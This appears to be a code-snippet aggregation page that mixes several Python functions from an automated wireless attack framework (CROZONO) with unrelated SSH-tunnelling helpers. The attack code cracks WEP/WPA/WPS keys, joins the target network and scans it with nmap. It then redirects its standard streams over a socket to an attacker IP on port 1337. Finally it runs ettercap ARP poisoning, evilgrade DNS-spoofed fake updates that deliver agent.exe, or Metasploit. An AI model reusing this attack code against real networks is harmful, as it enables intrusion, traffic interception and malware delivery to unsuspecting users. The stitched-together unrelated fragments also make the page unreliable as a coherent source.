Ejemplo n.º 1
0
def connect(essid, key, iface_mon=None):
	import fcntl
	import struct
	sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
	tries = 0

	if iface_mon is not None:
			call(['airmon-ng', 'stop', iface_mon], stdout=DN, stderr=DN)
			time.sleep(1)

	iface = get_ifaces()[0]

	def do_connect():
		nonlocal sock
		nonlocal tries
		info("Connecting to '{0}' with key '{1}'".format(essid, key if key is not None else ''))

		cmd_connect = pexpect.spawn('iwconfig {0} essid "{1}" key s:{2}'.format(iface, essid, key))
		cmd_connect.logfile = open(LOG_FILE, 'wb')
		cmd_connect.expect(['Error', pexpect.TIMEOUT, pexpect.EOF], 3)
		cmd_connect.close()
		parse_log_connect = open(LOG_FILE, 'r')
		for line in parse_log_connect:
			if line.find('Error') != -1:
				wpa_supplicant = open('/etc/wpa_supplicant/wpa_supplicant.conf', 'w')
				wpa_supplicant.write('ctrl_interface=/var/run/wpa_supplicant\n')
				wpa_supplicant.write('network={\n')
				wpa_supplicant.write('ssid="' + essid + '"\n')
				wpa_supplicant.write('key_mgmt=WPA-PSK\n')
				wpa_supplicant.write('psk="' + key.strip() + '"\n')
				wpa_supplicant.write('}')
				wpa_supplicant.close()
				call(['ifconfig', iface, 'down'], stdout=DN, stderr=DN)
				call(['dhclient', iface, '-r'], stdout=DN, stderr=DN)
				call(['ifconfig', iface, 'up'], stdout=DN, stderr=DN)
				call(['iwconfig', iface, 'mode', 'managed'])
				call(['killall', 'wpa_supplicant'], stdout=DN, stderr=DN)
				call(['wpa_supplicant', '-B', '-c', '/etc/wpa_supplicant/wpa_supplicant.conf', '-i', iface], stdout=DN,
					stderr=DN)
				time.sleep(2)
		parse_log_connect.close()
		os.remove(LOG_FILE)
		tries += 1
		call(['dhclient', iface], stdout=DN, stderr=DN)
		time.sleep(4)

	do_connect()
	if get_current_essid(iface) != essid and tries < 5:
		warn('Connection to {e} failed. Retrying.'.format(e=essid))
		do_connect()
	if get_current_essid(iface) == essid:
		ipaddr = socket.inet_ntoa(
				fcntl.ioctl(sock.fileno(), 0x8915, struct.pack('256s', bytes(iface[:15], 'utf-8')))[20:24])
		info('Connection to {e} succeeded! Our IP is: {i}'.format(e=essid, i=ipaddr))
		return ipaddr
	else:
		error('Could not connect to {e} after 5 tries. Aborting'.format(e=essid))
		exit(1)
Ejemplo n.º 2
0
def connect_to_lan():
	import fcntl
	import struct
	sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
	tries = 0

	if settings.INTERFACE_MON is not None:
			device_mgr.toggle_mode_monitor(False)
			time.sleep(1)

	def do_connect():
		nonlocal sock
		nonlocal tries
		info("Connecting to '{0}' with key '{1}'".format(settings.TARGET_ESSID, settings.TARGET_KEY if settings.TARGET_KEY is not None else ''))

		cmd_connect = pexpect.spawn('iwconfig {0} essid "{1}" key s:{2}'.format(settings.INTERFACE, settings.TARGET_ESSID, settings.TARGET_KEY))
		cmd_connect.logfile = open(settings.LOG_FILE, 'wb')
		cmd_connect.expect(['Error', pexpect.TIMEOUT, pexpect.EOF], 3)
		cmd_connect.close()
		parse_log_connect = open(settings.LOG_FILE, 'r')
		for line in parse_log_connect:
			if line.find('Error') != -1:
				wpa_supplicant = open('/etc/wpa_supplicant/wpa_supplicant.conf', 'w')
				wpa_supplicant.write('ctrl_interface=/var/run/wpa_supplicant\n')
				wpa_supplicant.write('network={\n')
				wpa_supplicant.write('ssid="' + settings.TARGET_ESSID + '"\n')
				wpa_supplicant.write('key_mgmt=WPA-PSK\n')
				wpa_supplicant.write('psk="' + settings.TARGET_KEY.strip() + '"\n')
				wpa_supplicant.write('}')
				wpa_supplicant.close()
				subprocess.call(['ifconfig', settings.INTERFACE, 'down'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
				subprocess.call(['dhclient', settings.INTERFACE, '-r'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
				subprocess.call(['ifconfig', settings.INTERFACE, 'up'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
				subprocess.call(['iwconfig', settings.INTERFACE, 'mode', 'managed'])
				subprocess.call(['killall', 'wpa_supplicant'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
				subprocess.call(['wpa_supplicant', '-B', '-c', '/etc/wpa_supplicant/wpa_supplicant.conf', '-i', settings.INTERFACE], stdout=subprocess.DEVNULL,
					stderr=subprocess.DEVNULL)
				time.sleep(2)
		parse_log_connect.close()
		os.remove(settings.LOG_FILE)
		tries += 1
		subprocess.call(['dhclient', settings.INTERFACE], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
		time.sleep(4)

	do_connect()
	if get_current_essid() != settings.TARGET_ESSID and tries < 5:
		warn('Connection to {e} failed. Retrying.'.format(e=settings.TARGET_ESSID))
		do_connect()
	if get_current_essid() == settings.TARGET_ESSID:
		ipaddr = socket.inet_ntoa(
				fcntl.ioctl(sock.fileno(), 0x8915, struct.pack('256s', bytes(settings.INTERFACE[:15], 'utf-8')))[20:24])
		info('Connection to {e} succeeded! Our IP is: {i}'.format(e=settings.TARGET_ESSID, i=ipaddr))
		settings.IP_LAN = ipaddr.strip()
	else:
		error('Could not connect to {e} after 5 tries. Aborting'.format(e=settings.TARGET_ESSID))
		exit(1)
Ejemplo n.º 3
0
def logout(timeout: int):
    global session
    session.sendline('exit')
    r = session.expect([pexpect.EOF, 'Connection to', pexpect.TIMEOUT], timeout=timeout)
    if r in (0, 1):
        return True
    else:
        session.sendline('kill -9 $$')
        log.warn('Connection killed itself')
        return False
Ejemplo n.º 4
0
def set_up_logging():
    global logging
    global session
    if logging is None:
        return
    if logging.get('file') is not None:
        # TODO: Log to file
        log.error('Log to file no implemented. Yet.')
    elif logging.get('console'):
        session.logfile = sys.stdout
    else:
        log.warn('Logging disabled')
Ejemplo n.º 5
0
def main():
	banner()
	if not check_root():
		error('You need root privileges to run CROZONO!\n')
		exit(1)
	if not check_wlan_attacks_dependences():
		exit(1)

	info("CROZONO running...")

	args = parse_args()

	if args.essid is not None:
		if args.key is not None:
			ap_target = False
			ip_lan = connect(args.essid, args.key)
		else:
			iface_mon = hardware_setup()
			new_mac = mac_changer(iface_mon)
			ap_target = scan_targets(iface_mon, args.essid)
	else:
		iface_mon = hardware_setup()
		new_mac = mac_changer(iface_mon)
		ap_target = scan_targets(iface_mon)

	# -------------------- Infiltrate wifi --------------------
	if ap_target:
		target_essid = ap_target.get('ESSID').strip()
		target_bssid = ap_target.get('BSSID').strip()
		target_channel = ap_target.get('channel').strip()
		target_privacy = ap_target.get('Privacy').strip()

		info("Target selected: " + target_essid)

		if target_privacy == 'WEP':
			info("Cracking {e} access point with WEP privacy...".format(e=target_essid))
			key = wep_attack(target_essid, target_bssid, target_channel, new_mac, iface_mon)
			if not key:
				error("Key not found! :(")
				exit()
			else:
				info("Key found!: {k} ".format(k=key))
				save_key(target_essid, key)
				ip_lan = connect(target_essid, key, iface_mon)

		elif target_privacy == 'WPA' or target_privacy == 'WPA2' or target_privacy == 'WPA2 WPA':
			info("Cracking {e} access point with {p} privacy...".format(e=target_essid, p=target_privacy))

			wps = wps_check(target_bssid, iface_mon)

			if wps:
				info("WPS is enabled")
				key = wpa_with_wps_attack(target_bssid, target_channel, iface_mon)
				if not key:
					warn("PIN not found! Trying with conventional WPA attack...")
					key = wpa_attack(target_bssid, target_channel, iface_mon)
			else:
				warn("WPS is not enabled")
				key = wpa_attack(target_bssid, target_channel, iface_mon)

			if not key:
				error("Key not found! :(")
				exit()
			else:
				info("Key found!: {k} ".format(k=key))
				save_key(target_essid, key)
				ip_lan = connect(target_essid, key, iface_mon)
		else:
			info("Open network!")
			ip_lan = connect(target_essid, None, iface_mon)

	# -------------------- Acquired LAN range --------------------

	ip_lan = ip_lan.strip()
	net = ip_lan.split('.')
	range_net = net[0] + '.' + net[1] + '.' + net[2] + '.1-255'

	# -------------------- Connect to attacker and relay nmap info --------------------

	if os.path.exists(OS_PATH + '/cr0z0n0_nmap'):
		os.remove(OS_PATH + '/cr0z0n0_nmap')

	if not check_lan_attacks_dependences():
		exit(1)

	attacker = args.dest

	if attacker is not None:
		info("Sending information about network to attacker ({ip}) and running attacks...".format(ip=attacker))
		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		s.connect((attacker, 1337))
		os.dup2(s.fileno(), 0)
		os.dup2(s.fileno(), 1)
		os.dup2(s.fileno(), 2)
		banner()
		info("Hello! :)")
		info("Executing Nmap...")
		call(['nmap', '-O', '-sV', '-oN', 'cr0z0n0_nmap', '--exclude', ip_lan, range_net], stderr=DN)
	else:
		warn("Attacker not defined! Ending...")
		exit()

	# -------------------- Attacks --------------------

	attack = args.attack

	if attack == 'sniffing-mitm':
		iface = get_ifaces()[0]
		gateway = get_gateway().strip()
		target_mitm = get_target_mitm(gateway, ip_lan)
		info("Executing MITM and Sniffing attacks between {g} and {m}...".format(g=gateway, m=target_mitm))
		cmd_ettercap = pexpect.spawn(
				'ettercap -T -M arp:remote /{g}/ /{m}/ -i {i}'.format(g=gateway, m=target_mitm, i=iface))
		time.sleep(2)
		# cmd_tshark = pexpect.spawn('tshark -i {i} -w cr0z0n0_sniff'.format(i=iface))
		proc = subprocess.call(["tshark", "-i", iface], stderr=DN)

	elif attack == 'evilgrade':
		modules = open(OS_PATH + '/evilgrade/modules.txt', 'r')
		agent = OS_PATH + '/evilgrade/agent.exe'
		for line in modules:
			print(line.replace('\n', ''))
		print("\n\n Select module to use: ")
		plugin = input()
		info("Thank you! Evilgrade will be executed!")
		s.shutdown(1)

		if os.path.exists('/etc/ettercap/etter.dns'):
			call(['rm', '/etc/ettercap/etter.dns'])
		etter_template = open(OS_PATH + '/evilgrade/etter.dns.template', 'r')
		etter_dns = open(OS_PATH + '/evilgrade/etter.dns', 'w')
		for line in etter_template:
			line = line.replace('IP', ip_lan)
			etter_dns.write(line)
		etter_dns.close()
		etter_template.close()
		call(['mv', './evilgrade/etter.dns', '/etc/ettercap/etter.dns'])

		evilgrade = pexpect.spawn('evilgrade')
		evilgrade.expect('evilgrade>')
		evilgrade.sendline('configure ' + plugin)
		evilgrade.sendline('set agent ' + agent)
		evilgrade.sendline('start')
		time.sleep(1)

		iface = get_ifaces()[0]
		gateway = get_gateway().strip()
		target_mitm = get_target_mitm(gateway, ip_lan)
		cmd_ettercap = pexpect.spawn(
				'ettercap -T -M arp:remote /{g}/ /{m}/ -i {i} -P dns_spoof'.format(g=gateway, m=target_mitm, i=iface))
		time.sleep(EVILGRADE_ATTACK_TIME)

	elif attack == 'metasploit':
		info("Executing Metasploit...")
		proc = subprocess.call(["msfconsole"], stderr=DN)
	else:
		warn("Attack not defined!")

	s.shutdown(1)

	info("CROZONO has finished! Good bye! ;)")
Ejemplo n.º 6
0
def main():
    global session
    global logging
    global disconnection_timeout

    c = args.config
    log.info('Using: {}'.format(os.path.join(os.path.dirname(os.path.abspath(c)), c)))
    with open(c) as f:
        config = yaml.load(f)
        logging = config.get('logging')
    tunnels = config.get('tunnels')
    all_tunnels = []
    [all_tunnels.append(Tunnel(t)) for t in tunnels]
    hops = config.get('hops')
    for i, hop in enumerate(hops):
        pid_stack = []
        key = list(hop.keys())[0]
        h = hop[key]
        hop = Hop(key, h, i)
        tunnels = []
        if hop.key_auth:
            if hop.index == len(hops) - 1:
                [tunnels.append(each.mapping) for each in all_tunnels]
            else:
                for tun in all_tunnels:
                    tunnels.append(tun.get_localhost_mapping())
            p = connect_with_key(hop.host, hop.user, hop.auth, tunnels)
            pid_stack.append(p)
        else:
            if hop.index == len(hops) - 1:
                [tunnels.append(each.mapping) for each in all_tunnels]
            else:
                for tun in all_tunnels:
                    tunnels.append(tun.get_localhost_mapping())
            p = connect_with_password(hop.host, hop.user, hop.auth, tunnels)
            pid_stack.append(p)

    session.sendline('while [ 1=1 ]; do echo \'keepalive\' ; sleep 3 ; done')
    log.info('Tunneling done:')
    [log.info(t) for t in all_tunnels]

    # TODO: Watch for broken pipe?
    try:
        input("Press ENTER to disconnect")
        print()
    except KeyboardInterrupt:
        log.error('Getting out of here!')
        disconnection_timeout = 0
    for h in reversed(hops):
        alias = list(h.keys())[0]
        log.info("Disconnecting from {}".format(alias))
        try:
            r = logout(disconnection_timeout)
        except KeyboardInterrupt:
            log.warn("Hurrying up.")
            r = None
            disconnection_timeout = 0
        if r:
            log.info('Disconnected')
        else:
            log.warn('Connection forcefully closed')
    try:
        os.kill(pid_stack[0], signal.SIGKILL)
        log.warn('Killed off remaining SSH process')
    except ProcessLookupError:
        pass
    log.info('Done')
Ejemplo n.º 7
0
def main():
	banner()

	if not checks.check_root():
		error('You need root privileges to run CROZONO!\n')
		exit(1)

	if not checks.check_wlan_attacks_dependencies():
		exit(1)

	args = parse_args()

	info("CROZONO running...")
	settings.OS_PATH = os.getcwd()
	settings.INTERFACE = args.interface if args.interface is not None else settings.INTERFACE
	settings.INTERFACE = device_mgr.get_ifaces()[0] if settings.INTERFACE is None else settings.INTERFACE
	settings.TARGET_ESSID = args.essid if args.essid is not None else settings.TARGET_ESSID
	settings.TARGET_KEY = args.key if args.key is not None else settings.TARGET_KEY
	settings.IP_ATTACKER = args.dest if args.dest is not None else settings.IP_ATTACKER
	settings.ATTACK = args.attack if args.attack is not None else settings.ATTACK


	if settings.TARGET_ESSID is not None:
		if settings.TARGET_KEY is not None:
			ap_target = None
			lan_mgr.connect_to_lan()
		else:
			device_mgr.hardware_setup()
			ap_target = airodump.scan_targets()
	else:
		device_mgr.hardware_setup()
		ap_target = airodump.scan_targets()

	# -------------------- Infiltrate wifi --------------------
	if ap_target is not None:
		settings.TARGET_ESSID = ap_target.get('ESSID').strip()
		settings.TARGET_BSSID = ap_target.get('BSSID').strip()
		settings.TARGET_CHANNEL = ap_target.get('channel').strip()
		settings.TARGET_PRIVACY = ap_target.get('Privacy').strip()

		info("Target selected: " + settings.TARGET_ESSID)

		if settings.TARGET_PRIVACY == 'WEP':
			from src.attacks import wep_attack
			info("Cracking {e} access point with WEP privacy...".format(e=settings.TARGET_ESSID))
			wep_attack.run()
			if settings.TARGET_KEY is None:
				error("Key not found! :(")
				exit()
			else:
				info("Key found!: {k} ".format(k=settings.TARGET_KEY))
				lan_mgr.save_key()
				lan_mgr.connect_to_lan()

		elif settings.TARGET_PRIVACY == 'WPA' or settings.TARGET_PRIVACY == 'WPA2' or settings.TARGET_PRIVACY == 'WPA2 WPA':
			from src.attacks import wpa_attack,wps_attack
			info("Cracking {e} access point with {p} privacy...".format(e=settings.TARGET_ESSID, p=settings.TARGET_PRIVACY))

			wps = wps_attack.check()

			if wps:
				info("WPS is enabled")
				wps_attack.pixiedust()
				if settings.TARGET_KEY is None:
					warn("PIN not found! Trying with conventional WPA attack...")
					wpa_attack.run()
			else:
				warn("WPS is not enabled")
				wpa_attack.run()

			if settings.TARGET_KEY is None:
				error("Key not found! :(")
				exit(1)
			else:
				info("Key found!: {k} ".format(k=settings.TARGET_KEY))
				lan_mgr.save_key()
				lan_mgr.connect_to_lan()
		else:
			info("Open network!")
			lan_mgr.connect_to_lan()

	# -------------------- Acquired LAN range -----------------------------------------

	lan_mgr.lan_range()
	lan_mgr.get_gateway()

	# -------------------- Connect to attacker and relay NMap info --------------------

	if os.path.exists(settings.OS_PATH + '/cr0z0n0_nmap'):
		os.remove(settings.OS_PATH + '/cr0z0n0_nmap')

	if not checks.check_lan_attacks_dependencies():
		exit(1)

	if settings.IP_ATTACKER is not None:
		info("Sending information about network to attacker ({ip}) and running attacks...".format(ip=settings.IP_ATTACKER))
		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		s.connect((settings.IP_ATTACKER, settings.PORT_ATTACKER))
		os.dup2(s.fileno(), 0)
		os.dup2(s.fileno(), 1)
		os.dup2(s.fileno(), 2)
		banner()
		info("Hello! :)")
		info("Executing Nmap...")
		subprocess.call(['nmap', '-O', '-sV', '-oN', 'cr0z0n0_nmap', '--exclude', settings.IP_LAN, settings.LAN_RANGE], stderr=subprocess.DEVNULL)
	else:
		warn("Attacker not defined! Ending up...")
		exit()

	# -------------------- Attacks --------------------

	if settings.ATTACK == 'sniffing-mitm':
		from src.attacks import sniffing_mitm
		sniffing_mitm.run()

	elif settings.ATTACK == 'metasploit':
		from src.attacks import metasploit
		metasploit.run()
	else:
		warn("Attack not defined!")

	s.shutdown(1)

	info("CROZONO has finished! Good bye! ;)")